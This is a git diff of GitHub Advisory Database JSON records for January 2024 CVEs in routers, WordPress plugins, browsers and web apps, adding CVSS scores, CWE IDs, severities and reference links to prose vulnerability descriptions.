b/advisories/unreviewed/2024/01/GHSA-7hrx-5vq8-6933/GHSA-7hrx-5vq8-6933.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7hrx-5vq8-6933", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-31T18:31:25Z", + "aliases": [ + "CVE-2024-23505" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DearHive PDF Viewer & 3D PDF Flipbook – DearPDF allows Stored XSS.This issue affects PDF Viewer & 3D PDF Flipbook – DearPDF: from n/a through 2.0.38.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23505" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/dearpdf-lite/wordpress-pdf-viewer-3d-pdf-flipbook-dearpdf-plugin-2-0-38-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7j77-3p87-xr63/GHSA-7j77-3p87-xr63.json b/advisories/unreviewed/2024/01/GHSA-7j77-3p87-xr63/GHSA-7j77-3p87-xr63.json index ed818b64affd7..94cdebc404e90 100644 --- a/advisories/unreviewed/2024/01/GHSA-7j77-3p87-xr63/GHSA-7j77-3p87-xr63.json +++ b/advisories/unreviewed/2024/01/GHSA-7j77-3p87-xr63/GHSA-7j77-3p87-xr63.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7j77-3p87-xr63", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-52039" ], "details": "An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_415AA4 function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7j85-cwr3-f2w3/GHSA-7j85-cwr3-f2w3.json b/advisories/unreviewed/2024/01/GHSA-7j85-cwr3-f2w3/GHSA-7j85-cwr3-f2w3.json new file mode 100644 index 0000000000000..1a0e346ba297a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7j85-cwr3-f2w3/GHSA-7j85-cwr3-f2w3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7j85-cwr3-f2w3", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24332" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the url parameter in the setUrlFilterRules function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24332" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/9/TOTOlink%20A3300R%20setUrlFilterRules.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7jg3-fhmp-w7fm/GHSA-7jg3-fhmp-w7fm.json b/advisories/unreviewed/2024/01/GHSA-7jg3-fhmp-w7fm/GHSA-7jg3-fhmp-w7fm.json index 5566542e4c621..3dfab4674892f 100644 --- a/advisories/unreviewed/2024/01/GHSA-7jg3-fhmp-w7fm/GHSA-7jg3-fhmp-w7fm.json +++ b/advisories/unreviewed/2024/01/GHSA-7jg3-fhmp-w7fm/GHSA-7jg3-fhmp-w7fm.json @@ -36,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-7jjr-w4qc-c237/GHSA-7jjr-w4qc-c237.json b/advisories/unreviewed/2024/01/GHSA-7jjr-w4qc-c237/GHSA-7jjr-w4qc-c237.json new file mode 100644 index 0000000000000..60336fa51c811 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7jjr-w4qc-c237/GHSA-7jjr-w4qc-c237.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jjr-w4qc-c237", + "modified": "2024-01-30T06:30:23Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2024-1028" + ], + "details": "A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Post Handler. The manipulation of the argument Description with the input HACKED leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252301 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1028" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252301" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252301" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T05:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7jm4-gcxp-f8vv/GHSA-7jm4-gcxp-f8vv.json b/advisories/unreviewed/2024/01/GHSA-7jm4-gcxp-f8vv/GHSA-7jm4-gcxp-f8vv.json new file mode 100644 index 0000000000000..e3b7201092223 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7jm4-gcxp-f8vv/GHSA-7jm4-gcxp-f8vv.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jm4-gcxp-f8vv", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2024-1009" + ], + "details": "A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Admin/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252278 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1009" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252278" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252278" + }, + { + "type": "WEB", + "url": "https://youtu.be/oL98TSjy89Q?si=_T6YkJZlbn7SJ4Gn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7jq7-8r3x-pjjq/GHSA-7jq7-8r3x-pjjq.json b/advisories/unreviewed/2024/01/GHSA-7jq7-8r3x-pjjq/GHSA-7jq7-8r3x-pjjq.json index ee5b968339061..edc2adc1fec09 100644 --- a/advisories/unreviewed/2024/01/GHSA-7jq7-8r3x-pjjq/GHSA-7jq7-8r3x-pjjq.json +++ b/advisories/unreviewed/2024/01/GHSA-7jq7-8r3x-pjjq/GHSA-7jq7-8r3x-pjjq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7jq7-8r3x-pjjq", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0753" ], "details": "In specific HSTS configurations an attacker could have bypassed HSTS on a subdomain. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -43,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7m9h-xc4x-cg98/GHSA-7m9h-xc4x-cg98.json b/advisories/unreviewed/2024/01/GHSA-7m9h-xc4x-cg98/GHSA-7m9h-xc4x-cg98.json new file mode 100644 index 0000000000000..d2d8baf004d6a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7m9h-xc4x-cg98/GHSA-7m9h-xc4x-cg98.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7m9h-xc4x-cg98", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-4551" + ], + "details": "Improper Input Validation vulnerability in OpenText AppBuilder on Windows, Linux allows OS Command Injection.\n\nThe AppBuilder's Scheduler functionality that facilitates creation of scheduled tasks is vulnerable to command injection. This allows authenticated users to inject arbitrary operating system commands into the executing process.\n\n\nThis issue affects AppBuilder: from 21.2 before 23.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4551" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_search&kb_category=61648712db61781068cfd6c4e296197b" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json b/advisories/unreviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json deleted file mode 100644 index f3c3c2dda6867..0000000000000 --- a/advisories/unreviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json +++ /dev/null @@ -1,50 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7mgg-3rq2-hff4", - "modified": "2024-01-27T12:30:25Z", - "published": "2024-01-27T12:30:25Z", - "aliases": [ - "CVE-2024-0960" - ], - "details": "A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file \\ai_flow\\cli\\commands\\workflow_command.py. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0960" - }, - { - "type": "WEB", - "url": "https://github.com/bayuncao/vul-cve-8" - }, - { - "type": "WEB", - "url": "https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl" - }, - { - "type": "WEB", - "url": "https://vuldb.com/?ctiid.252205" - }, - { - "type": "WEB", - "url": "https://vuldb.com/?id.252205" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-502" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-01-27T12:15:07Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7pvg-hvr4-rj6w/GHSA-7pvg-hvr4-rj6w.json b/advisories/unreviewed/2024/01/GHSA-7pvg-hvr4-rj6w/GHSA-7pvg-hvr4-rj6w.json new file mode 100644 index 0000000000000..9de7e9281d575 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7pvg-hvr4-rj6w/GHSA-7pvg-hvr4-rj6w.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pvg-hvr4-rj6w", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2024-1036" + ], + "details": "A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function uploadIcon of the file /application/index/controller/Screen.php of the component Icon Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252311.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1036" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/X1ASzPP5rHel" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252311" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252311" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T18:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7qfc-6cw5-2ppm/GHSA-7qfc-6cw5-2ppm.json b/advisories/unreviewed/2024/01/GHSA-7qfc-6cw5-2ppm/GHSA-7qfc-6cw5-2ppm.json index a16e1daaadfcf..6551334e86a1a 100644 --- a/advisories/unreviewed/2024/01/GHSA-7qfc-6cw5-2ppm/GHSA-7qfc-6cw5-2ppm.json +++ b/advisories/unreviewed/2024/01/GHSA-7qfc-6cw5-2ppm/GHSA-7qfc-6cw5-2ppm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7qfc-6cw5-2ppm", - "modified": "2024-01-19T18:30:28Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-19T18:30:28Z", "aliases": [ "CVE-2023-47033" ], "details": "MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-19T17:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7qg3-c5c5-86rv/GHSA-7qg3-c5c5-86rv.json b/advisories/unreviewed/2024/01/GHSA-7qg3-c5c5-86rv/GHSA-7qg3-c5c5-86rv.json index b82aa9f5ead63..5bea9c878794f 100644 --- a/advisories/unreviewed/2024/01/GHSA-7qg3-c5c5-86rv/GHSA-7qg3-c5c5-86rv.json +++ b/advisories/unreviewed/2024/01/GHSA-7qg3-c5c5-86rv/GHSA-7qg3-c5c5-86rv.json @@ -44,7 +44,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-7r27-33fg-9cpx/GHSA-7r27-33fg-9cpx.json b/advisories/unreviewed/2024/01/GHSA-7r27-33fg-9cpx/GHSA-7r27-33fg-9cpx.json index 628d8230711b9..bc971a0d5563d 100644 --- a/advisories/unreviewed/2024/01/GHSA-7r27-33fg-9cpx/GHSA-7r27-33fg-9cpx.json +++ b/advisories/unreviewed/2024/01/GHSA-7r27-33fg-9cpx/GHSA-7r27-33fg-9cpx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7r27-33fg-9cpx", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2021-42144" ], "details": "Buffer over-read vulnerability in Contiki-NG tinyDTLS through master branch 53a0d97 allows attackers obtain sensitive information via crafted input to dtls_ccm_decrypt_message().", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-125" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7v3h-fr8r-9pvm/GHSA-7v3h-fr8r-9pvm.json b/advisories/unreviewed/2024/01/GHSA-7v3h-fr8r-9pvm/GHSA-7v3h-fr8r-9pvm.json index 045f6db085450..9e037cb4785d4 100644 --- a/advisories/unreviewed/2024/01/GHSA-7v3h-fr8r-9pvm/GHSA-7v3h-fr8r-9pvm.json +++ b/advisories/unreviewed/2024/01/GHSA-7v3h-fr8r-9pvm/GHSA-7v3h-fr8r-9pvm.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-7vrx-mj2w-52mf/GHSA-7vrx-mj2w-52mf.json b/advisories/unreviewed/2024/01/GHSA-7vrx-mj2w-52mf/GHSA-7vrx-mj2w-52mf.json index c3cbd49df44a7..39b4163c8f683 100644 --- a/advisories/unreviewed/2024/01/GHSA-7vrx-mj2w-52mf/GHSA-7vrx-mj2w-52mf.json +++ b/advisories/unreviewed/2024/01/GHSA-7vrx-mj2w-52mf/GHSA-7vrx-mj2w-52mf.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-78", "CWE-94" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2024/01/GHSA-7wff-94vq-2q76/GHSA-7wff-94vq-2q76.json b/advisories/unreviewed/2024/01/GHSA-7wff-94vq-2q76/GHSA-7wff-94vq-2q76.json index a01eea66691e6..9c1b5e68a0ab9 100644 --- a/advisories/unreviewed/2024/01/GHSA-7wff-94vq-2q76/GHSA-7wff-94vq-2q76.json +++ b/advisories/unreviewed/2024/01/GHSA-7wff-94vq-2q76/GHSA-7wff-94vq-2q76.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7wff-94vq-2q76", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-02-06T15:32:04Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-35835" ], "details": "An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. The device provides a WiFi access point for initial configuration. The WiFi network provided has no network authentication (such as an encryption key) and persists permanently, including after enrollment and setup is complete. The WiFi network serves a web-based configuration utility, as well as an unauthenticated ModBus protocol interface.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T23:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-82g7-hvfx-485f/GHSA-82g7-hvfx-485f.json b/advisories/unreviewed/2024/01/GHSA-82g7-hvfx-485f/GHSA-82g7-hvfx-485f.json new file mode 100644 index 0000000000000..bda17ffb1fdd9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-82g7-hvfx-485f/GHSA-82g7-hvfx-485f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82g7-hvfx-485f", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2023-7089" + ], + "details": "The Easy SVG Allow WordPress plugin through 1.0 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7089" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/3b8ba734-7764-4ab6-a7e2-8de55bd46bed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-835p-c6x8-xh5f/GHSA-835p-c6x8-xh5f.json b/advisories/unreviewed/2024/01/GHSA-835p-c6x8-xh5f/GHSA-835p-c6x8-xh5f.json index 89aa1582f511e..fe7e47a41b5da 100644 --- a/advisories/unreviewed/2024/01/GHSA-835p-c6x8-xh5f/GHSA-835p-c6x8-xh5f.json +++ b/advisories/unreviewed/2024/01/GHSA-835p-c6x8-xh5f/GHSA-835p-c6x8-xh5f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-835p-c6x8-xh5f", - "modified": "2024-01-02T12:30:18Z", + "modified": "2024-02-08T12:30:48Z", "published": "2024-01-02T12:30:18Z", "aliases": [ "CVE-2023-6693" @@ -28,6 +28,10 @@ { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254580" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0004/" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-83wx-v283-85g9/GHSA-83wx-v283-85g9.json b/advisories/unreviewed/2024/01/GHSA-83wx-v283-85g9/GHSA-83wx-v283-85g9.json index 2ba7444cde3cc..7d765d3756291 100644 --- a/advisories/unreviewed/2024/01/GHSA-83wx-v283-85g9/GHSA-83wx-v283-85g9.json +++ b/advisories/unreviewed/2024/01/GHSA-83wx-v283-85g9/GHSA-83wx-v283-85g9.json @@ -36,6 +36,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-84m5-rqxq-483p/GHSA-84m5-rqxq-483p.json b/advisories/unreviewed/2024/01/GHSA-84m5-rqxq-483p/GHSA-84m5-rqxq-483p.json index a858bfc067093..70bcb3bc8bc50 100644 --- a/advisories/unreviewed/2024/01/GHSA-84m5-rqxq-483p/GHSA-84m5-rqxq-483p.json +++ b/advisories/unreviewed/2024/01/GHSA-84m5-rqxq-483p/GHSA-84m5-rqxq-483p.json @@ -36,6 +36,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-79", "CWE-80" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2024/01/GHSA-8523-f95g-92mc/GHSA-8523-f95g-92mc.json b/advisories/unreviewed/2024/01/GHSA-8523-f95g-92mc/GHSA-8523-f95g-92mc.json index 768b2fa37993c..d9d423ac6e64c 100644 --- a/advisories/unreviewed/2024/01/GHSA-8523-f95g-92mc/GHSA-8523-f95g-92mc.json +++ b/advisories/unreviewed/2024/01/GHSA-8523-f95g-92mc/GHSA-8523-f95g-92mc.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8523-f95g-92mc", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-38624" ], "details": "A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis is a similar, but not identical vulnerability as CVE-2023-38625 through CVE-2023-38627.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8622-rmmr-47jv/GHSA-8622-rmmr-47jv.json b/advisories/unreviewed/2024/01/GHSA-8622-rmmr-47jv/GHSA-8622-rmmr-47jv.json new file mode 100644 index 0000000000000..93365eff41cf9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8622-rmmr-47jv/GHSA-8622-rmmr-47jv.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8622-rmmr-47jv", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6389" + ], + "details": "The WordPress Toolbar WordPress plugin through 2.2.6 redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6389" + }, + { + "type": "WEB", + "url": "https://magos-securitas.com/txt/CVE-2023-6389.txt" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-863w-397j-xxp5/GHSA-863w-397j-xxp5.json b/advisories/unreviewed/2024/01/GHSA-863w-397j-xxp5/GHSA-863w-397j-xxp5.json new file mode 100644 index 0000000000000..66b6cb0df2c58 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-863w-397j-xxp5/GHSA-863w-397j-xxp5.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-863w-397j-xxp5", + "modified": "2024-01-30T06:30:23Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2023-45923" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45923" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-867h-h9jh-9vf4/GHSA-867h-h9jh-9vf4.json b/advisories/unreviewed/2024/01/GHSA-867h-h9jh-9vf4/GHSA-867h-h9jh-9vf4.json index b1303230b9a8e..79101295ef421 100644 --- a/advisories/unreviewed/2024/01/GHSA-867h-h9jh-9vf4/GHSA-867h-h9jh-9vf4.json +++ b/advisories/unreviewed/2024/01/GHSA-867h-h9jh-9vf4/GHSA-867h-h9jh-9vf4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-867h-h9jh-9vf4", - "modified": "2024-01-24T00:30:33Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:33Z", "aliases": [ "CVE-2024-0813" ], "details": "Use after free in Reading Mode in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" diff --git 